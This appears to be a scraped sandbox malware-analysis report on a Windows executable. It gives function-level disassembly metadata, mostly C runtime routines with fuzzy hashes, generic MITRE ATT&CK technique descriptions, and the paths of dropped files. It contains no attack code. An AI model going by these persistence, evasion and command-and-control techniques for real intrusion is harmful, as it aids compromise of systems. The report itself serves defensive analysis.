Instruction Fuzzy Hash: 53B09231000108BBDB162F12EC0ED4D3F6AFB813A0BA0C024F80D49132DF72ADA29A94

Function 002C261B Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 002C2630

Memory Dump Source

Source File: 00000029.00000002.3176545780.00000000002C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000029.00000002.3176512058.00000000002C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176608493.00000000002CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176635430.00000000002CC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2c0000_XKXK7Ueky.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: bbf5f330dd1804d101b84e9c517f6abd4d7a58323c25cbd714a337a7f8c1938e
Instruction ID: 1507ca8e525ff0c864e2778b2b883936ab93d81b5fed329c6eb62e6a820ba491
Opcode Fuzzy Hash: bbf5f330dd1804d101b84e9c517f6abd4d7a58323c25cbd714a337a7f8c1938e
Instruction Fuzzy Hash: 2DD0A7325543459EDB119F75BC0DF223BDCD384395F108435BD0CC6150FA70C594DA00

Function 002C1681 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 002C168D

Part of subcall function 002C1555: __lock.LIBCMT ref: 002C1563
Part of subcall function 002C1555: __decode_pointer.LIBCMT ref: 002C159A
Part of subcall function 002C1555: __decode_pointer.LIBCMT ref: 002C15AF
Part of subcall function 002C1555: __decode_pointer.LIBCMT ref: 002C15D9
Part of subcall function 002C1555: __decode_pointer.LIBCMT ref: 002C15EF
Part of subcall function 002C1555: __decode_pointer.LIBCMT ref: 002C15FC
Part of subcall function 002C1555: __initterm.LIBCMT ref: 002C162B
Part of subcall function 002C1555: __initterm.LIBCMT ref: 002C163B

Memory Dump Source

Source File: 00000029.00000002.3176545780.00000000002C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000029.00000002.3176512058.00000000002C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176608493.00000000002CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176635430.00000000002CC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2c0000_XKXK7Ueky.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 64d3e69be7683117856c4d253241fbf83632f00d4d4a11a565b8e4c85c1df654
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: 56B0923259020873DB202586AC03F063A0987C1BA0E650020FA0C191E2A9A2A971848A

Non-executed Functions

Function 002C10CC Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 002C1346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002C135B
UnhandledExceptionFilter.KERNEL32(002C816C), ref: 002C1366
GetCurrentProcess.KERNEL32(C0000409), ref: 002C1382
TerminateProcess.KERNEL32(00000000), ref: 002C1389

Memory Dump Source

Source File: 00000029.00000002.3176545780.00000000002C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000029.00000002.3176512058.00000000002C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176608493.00000000002CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176635430.00000000002CC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2c0000_XKXK7Ueky.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 5a80f59aea241dd1deef9b7e50b49d8680875382f395de8b3a466d24ab46bbdb
Instruction ID: f2c979e1d5466efd197344c48bc33f3e45df1caaefbdf49fb0e5613f447e946c
Opcode Fuzzy Hash: 5a80f59aea241dd1deef9b7e50b49d8680875382f395de8b3a466d24ab46bbdb
Instruction Fuzzy Hash: 9B21BEB4811248DFC711DF28FD8DE583BB0FB4834AF50851AE50A87A71EBB85999CF46

Function 002C21E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,002C9458,0000000C,002C2320,00000000,00000000,?,002C174F,00000003,?,?,?,?,?,?,002C10F6), ref: 002C21F7
__crt_waiting_on_module_handle.LIBCMT ref: 002C2202

Part of subcall function 002C13E1: Sleep.KERNEL32(000003E8,00000000,?,002C2148,KERNEL32.DLL,?,002C2194,?,002C174F,00000003), ref: 002C13ED
Part of subcall function 002C13E1: GetModuleHandleW.KERNEL32(?,?,002C2148,KERNEL32.DLL,?,002C2194,?,002C174F,00000003,?,?,?,?,?,?,002C10F6), ref: 002C13F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 002C222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 002C223B
__lock.LIBCMT ref: 002C225D
InterlockedIncrement.KERNEL32(002CA4D8), ref: 002C226A
__lock.LIBCMT ref: 002C227E
___addlocaleref.LIBCMT ref: 002C229C

Strings

KERNEL32.DLL, xrefs: 002C21F1, 002C21F6, 002C2201
EncodePointer, xrefs: 002C221F
DecodePointer, xrefs: 002C2233

Memory Dump Source

Source File: 00000029.00000002.3176545780.00000000002C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000029.00000002.3176512058.00000000002C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176608493.00000000002CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176635430.00000000002CC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2c0000_XKXK7Ueky.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: a5e1ba0f69770d98e7fce8fd139b20e0f829d14057576f10fdff9e94f7440d35
Instruction ID: f813cf6e417faeb73261185841192bc3b0efef7d124affc682ae65a8cb887c77
Opcode Fuzzy Hash: a5e1ba0f69770d98e7fce8fd139b20e0f829d14057576f10fdff9e94f7440d35
Instruction Fuzzy Hash: 5A11D271850701DED720EF75D809F4ABBE0AF10314F20871EE499A32A0DF709A68CF21

Function 002C40A0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 002C40AC

Part of subcall function 002C2345: __getptd_noexit.LIBCMT ref: 002C2348
Part of subcall function 002C2345: __amsg_exit.LIBCMT ref: 002C2355

__amsg_exit.LIBCMT ref: 002C40CC
__lock.LIBCMT ref: 002C40DC
InterlockedDecrement.KERNEL32(?), ref: 002C40F9
InterlockedIncrement.KERNEL32(021C2AF0), ref: 002C4124

Memory Dump Source

Source File: 00000029.00000002.3176545780.00000000002C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000029.00000002.3176512058.00000000002C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176608493.00000000002CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176635430.00000000002CC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2c0000_XKXK7Ueky.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: be3e5c2eb956df7f71e93f995db08f3d3b780c34de1dc09b436e0f6aa7e02293
Instruction ID: e371c42783455457c129a6c7ea280616edc74f4cfb4565f369b124a85878b129
Opcode Fuzzy Hash: be3e5c2eb956df7f71e93f995db08f3d3b780c34de1dc09b436e0f6aa7e02293
Instruction Fuzzy Hash: A101ED32921616DBCB25BF24A80BF5A7360BF04750F19820CE904A3281CB7469B5CFE2

Function 002C35EE Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 002C360C

Part of subcall function 002C2AA0: __mtinitlocknum.LIBCMT ref: 002C2AB6
Part of subcall function 002C2AA0: __amsg_exit.LIBCMT ref: 002C2AC2
Part of subcall function 002C2AA0: EnterCriticalSection.KERNEL32(?,?,?,002C5600,00000004,002C9628,0000000C,002C3746,?,?,00000000,00000000,00000000,?,002C22F7,00000001), ref: 002C2ACA

___sbh_find_block.LIBCMT ref: 002C3617
___sbh_free_block.LIBCMT ref: 002C3626
HeapFree.KERNEL32(00000000,?,002C9568,0000000C,002C2A81,00000000,002C94C8,0000000C,002C2ABB,?,?,?,002C5600,00000004,002C9628,0000000C), ref: 002C3656
GetLastError.KERNEL32(?,002C5600,00000004,002C9628,0000000C,002C3746,?,?,00000000,00000000,00000000,?,002C22F7,00000001,00000214), ref: 002C3667

Memory Dump Source

Source File: 00000029.00000002.3176545780.00000000002C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000029.00000002.3176512058.00000000002C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176608493.00000000002CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176635430.00000000002CC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2c0000_XKXK7Ueky.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 9ee94f6d546a7b4543f801d80a52b31ed304dd600783b3780c6f3247d0b854ba
Instruction ID: a2bb98197e9af61c070a61e2865a59407cc99c69f122797bd5dda553652a1469
Opcode Fuzzy Hash: 9ee94f6d546a7b4543f801d80a52b31ed304dd600783b3780c6f3247d0b854ba
Instruction Fuzzy Hash: AD014F71D24306EADB21EF71AC0AF5E7668AF11760F70870DF40466291CE348664CE5D

Function 002C3E04 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 002C3E10

Part of subcall function 002C2345: __getptd_noexit.LIBCMT ref: 002C2348
Part of subcall function 002C2345: __amsg_exit.LIBCMT ref: 002C2355

__getptd.LIBCMT ref: 002C3E27
__amsg_exit.LIBCMT ref: 002C3E35
__lock.LIBCMT ref: 002C3E45

Memory Dump Source

Source File: 00000029.00000002.3176545780.00000000002C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000029.00000002.3176512058.00000000002C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176608493.00000000002CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176635430.00000000002CC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2c0000_XKXK7Ueky.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 2e30629091956973cedb5c4bb7941a5402d7987ff2255fb592d888902545cbcf
Instruction ID: a1d2f6acce146ed4d3b8e96a6b57dc5ec37904c7d2d83bb5e49f1da95072c26c
Opcode Fuzzy Hash: 2e30629091956973cedb5c4bb7941a5402d7987ff2255fb592d888902545cbcf
Instruction Fuzzy Hash: 00F06D32960705CBD720FFB4980AF4D73A0AF48720F108B8DA441A7292CF749A658F62

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 149876985-734579485.05.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe

C:\Program Files (x86)\1pZu9Rh\log.src

C:\Program Files (x86)\1pZu9Rh\tbcore3U.dll

C:\Program Files (x86)\1pZu9Rh\utils.vcxproj

C:\Program Files (x86)\YYAfLM\YYAfLM.exe

C:\Program Files (x86)\YYAfLM\log.src

C:\Program Files (x86)\YYAfLM\tbcore3U.dll

C:\Program Files (x86)\YYAfLM\utils.vcxproj

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Windows Analysis Report
149876985-734579485.05.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre